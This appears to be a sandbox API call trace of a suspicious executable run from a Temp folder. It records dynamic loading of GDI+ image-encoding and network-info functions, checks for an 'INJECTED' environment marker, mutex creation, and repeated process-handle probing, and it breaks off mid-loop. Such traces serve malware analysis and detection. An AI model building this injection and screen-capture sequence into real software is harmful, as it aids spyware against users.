GetProcAddress (hModule=0x74160000, lpProcName="GdipCreateBitmapFromHBITMAP") returned 0x74196671 [0043.428] GetProcAddress (hModule=0x74160000, lpProcName="GdipGetImageEncodersSize") returned 0x741a2203 [0043.428] GetProcAddress (hModule=0x74160000, lpProcName="GdipGetImageEncoders") returned 0x741a228c [0043.429] GetProcAddress (hModule=0x74160000, lpProcName="GdipSaveImageToStream") returned 0x74194153 [0043.429] GetProcAddress (hModule=0x74160000, lpProcName="GdipDisposeImage") returned 0x74194cc8 [0043.429] GetProcAddress (hModule=0x74160000, lpProcName="GdipFree") returned 0x741a24b2 [0043.429] GetProcAddress (hModule=0x74160000, lpProcName="GdipCloneImage") returned 0x74194bfa [0043.429] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74140000 [0043.455] GetProcAddress (hModule=0x74140000, lpProcName="NetApiBufferFree") returned 0x745b13d2 [0043.456] GetProcAddress (hModule=0x74140000, lpProcName="NetWkstaGetInfo") returned 0x74145570 [0043.456] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x76a40000 [0043.456] GetProcAddress (hModule=0x76a40000, lpProcName="malloc") returned 0x76a49cee [0043.456] GetProcAddress (hModule=0x76a40000, lpProcName="vsprintf") returned 0x76ab7677 [0043.456] GetProcAddress (hModule=0x76a40000, lpProcName="free") returned 0x76a49894 [0043.456] GetProcAddress (hModule=0x76a40000, lpProcName="??3@YAXPAX@Z") returned 0x76a4b0b9 [0043.456] GetProcAddress (hModule=0x76a40000, lpProcName="??2@YAPAXI@Z") returned 0x76a4b0c9 [0043.456] GetProcAddress (hModule=0x76a40000, lpProcName="memcpy") returned 0x76a49910 [0043.456] GetProcAddress (hModule=0x76a40000, lpProcName="memmove") returned 0x76a49e5a [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="puts") returned 0x76ab8d04 [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="abort") returned 0x76aa8e53 [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="memset") returned 0x76a49790 [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="strlen") returned 0x76a543d3 [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="wcslen") returned 0x76a5d335 [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="exit") returned 0x76a536aa [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="realloc") returned 0x76a4b10d [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="strncmp") returned 0x76a4b443 [0043.457] GetProcAddress (hModule=0x76a40000, lpProcName="_strcmpi") returned 0x76a4db38 [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="_vsnwprintf") returned 0x76a4bbce [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="_purecall") returned 0x76aa6ea9 [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="tolower") returned 0x76a4c4f0 [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="atoi") returned 0x76a4dbe0 [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="strcmp") returned 0x76a58b11 [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="atol") returned 0x76a4ddf4 [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="_wcsicmp") returned 0x76a4a9e9 [0043.458] GetProcAddress (hModule=0x76a40000, lpProcName="_snwprintf") returned 0x76a695d1 [0043.459] GetProcAddress (hModule=0x76a40000, lpProcName="wcscmp") returned 0x76a5d3b7 [0043.459] GetProcAddress (hModule=0x76a40000, lpProcName="wcsrchr") returned 0x76a4a73f [0043.459] GetProcAddress (hModule=0x76a40000, lpProcName="wcscpy") returned 0x76a5d4f8 [0043.459] GetProcAddress (hModule=0x76a40000, lpProcName="_errno") returned 0x76a4a5b8 [0043.459] GetProcAddress (hModule=0x76a40000, lpProcName="wcschr") returned 0x76a4aa61 [0043.459] GetProcAddress (hModule=0x76a40000, lpProcName="strchr") returned 0x76a4dbeb [0043.459] GetProcAddress (hModule=0x76a40000, lpProcName="_iob") returned 0x76ae2900 [0043.462] SetEnvironmentVariableA (lpName="bound", lpValue="941401012") returned 1 [0043.462] GetCurrentProcess () returned 0xffffffff [0043.462] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x0, dwSize=0x0) returned 1 [0043.462] VirtualAlloc (lpAddress=0x0, dwSize=0x76000, flAllocationType=0x3000, flProtect=0x4) returned 0x4e50000 [0043.464] QueryPerformanceCounter (in: lpPerformanceCount=0x18a9d0 | out: lpPerformanceCount=0x18a9d0*=407240045) returned 1 [0043.464] GetTickCount () returned 0x1a063 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7a2cde1a [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6bc5c62 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x24bb3820 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x56b177fd [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x52dabe9d [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x695e243b [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4c8bc0aa [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x75932ae1 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3973dd20 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x28a68b82 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x78b99911 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x34737bb4 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x36d67c9a [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6df5c727 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3f32a78a [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7bd8ce81 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4faaed26 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x76013d2b [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x50d656cd [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5974b425 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6980796c [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x40ac432e [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x147e409e [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7e935f0f [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x546fd0b4 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5eeaeb8d [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x773ce092 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4862e393 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x76d9750b [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x619dab9e [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6f7a9b5b [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5c37d02a [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3cb1a62e [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x32845438 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x323e04be [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x212ae580 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x139d2e78 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x3bdcf4dc [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2232827a [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5d8428a1 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4280e206 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x45a68d93 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7a50bbc6 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4db405d8 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5475b975 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x26d33ca3 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0xd24eb7c [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x5b5506ca [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x70294ee [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x320a1743 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x4f11ec54 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x1d60f80f [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x23e444b6 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x2a1f6232 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x374dad1 [0043.464] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6decd52f [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x7dddcbe7 [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x373927c1 [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x6cdb60d1 [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x74b49ff8 [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x53fce379 [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x290e1954 [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x335a7a0d [0043.465] RtlRandom (in: Seed=0x4e3b790 | out: Seed=0x4e3b790) returned 0x735fc311 [0043.469] VirtualQuery (in: lpAddress=0x4de262c, lpBuffer=0x18a9e0, dwLength=0x1c | out: lpBuffer=0x18a9e0*(BaseAddress=0x4de2000, AllocationBase=0x4dd0000, AllocationProtect=0x40, RegionSize=0x64000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c [0043.469] PostMessageW (hWnd=0x0, Msg=0x401, wParam=0x0, lParam=0x0) returned 1 [0043.469] GetMessageW (in: lpMsg=0x18aa20, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18aa20) returned 1 [0043.469] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c0 [0043.469] SetErrorMode (uMode=0x8003) returned 0x0 [0043.469] GetEnvironmentVariableA (in: lpName="RESTARTED", lpBuffer=0x18a9f8, nSize=0x9 | out: lpBuffer="") returned 0x0 [0043.469] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe\" " [0043.469] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe\" ", pNumArgs=0x18a970 | out: pNumArgs=0x18a970) returned 0x66ff38*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" [0043.469] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe\" " [0043.469] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe\" ", pNumArgs=0x18a974 | out: pNumArgs=0x18a974) returned 0x667750*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" [0043.470] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18a564, nSize=0x207 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\pst790mv.exe")) returned 0x3d [0043.470] wcslen (_String="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\pST790mv.exe") returned 0x3d [0043.470] GetEnvironmentVariableW (in: lpName="SELF", lpBuffer=0x18a03c, nSize=0x207 | out: lpBuffer="") returned 0x0 [0043.470] GetEnvironmentVariableA (in: lpName="INJECTED", lpBuffer=0x18a44c, nSize=0x103 | out: lpBuffer="") returned 0x0 [0043.470] OpenMutexA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="df7689e6-c49f-4a86-82e8-6809a406872a") returned 0x0 [0043.470] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18a930, dwRevision=0x1 | out: pSecurityDescriptor=0x18a930) returned 1 [0043.470] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18a930, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18a930) returned 1 [0043.470] CreateMutexA (lpMutexAttributes=0x18a924, bInitialOwner=1, lpName="df7689e6-c49f-4a86-82e8-6809a406872a") returned 0x1c4 [0043.470] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x2600848, Length=0x15000, ResultLength=0x18a9a0 | out: SystemInformation=0x2600848, ResultLength=0x18a9a0*=0x1e7d4) returned 0xc0000004 [0043.473] NtQuerySystemInformation (in: SystemInformationClass=0x10, SystemInformation=0x2615850, Length=0x1e7d4, ResultLength=0x18a9a0 | out: SystemInformation=0x2615850, ResultLength=0x18a9a0*=0x1e7d4) returned 0x0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.476] CloseHandle (hObject=0x0) returned 0 [0043.476] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.477] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.477] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.478] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.478] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.479] CloseHandle (hObject=0x0) returned 0 [0043.479] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.480] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.480] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0043.481] CloseHandle (hObject=0x0) returned 0 [0043.481] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 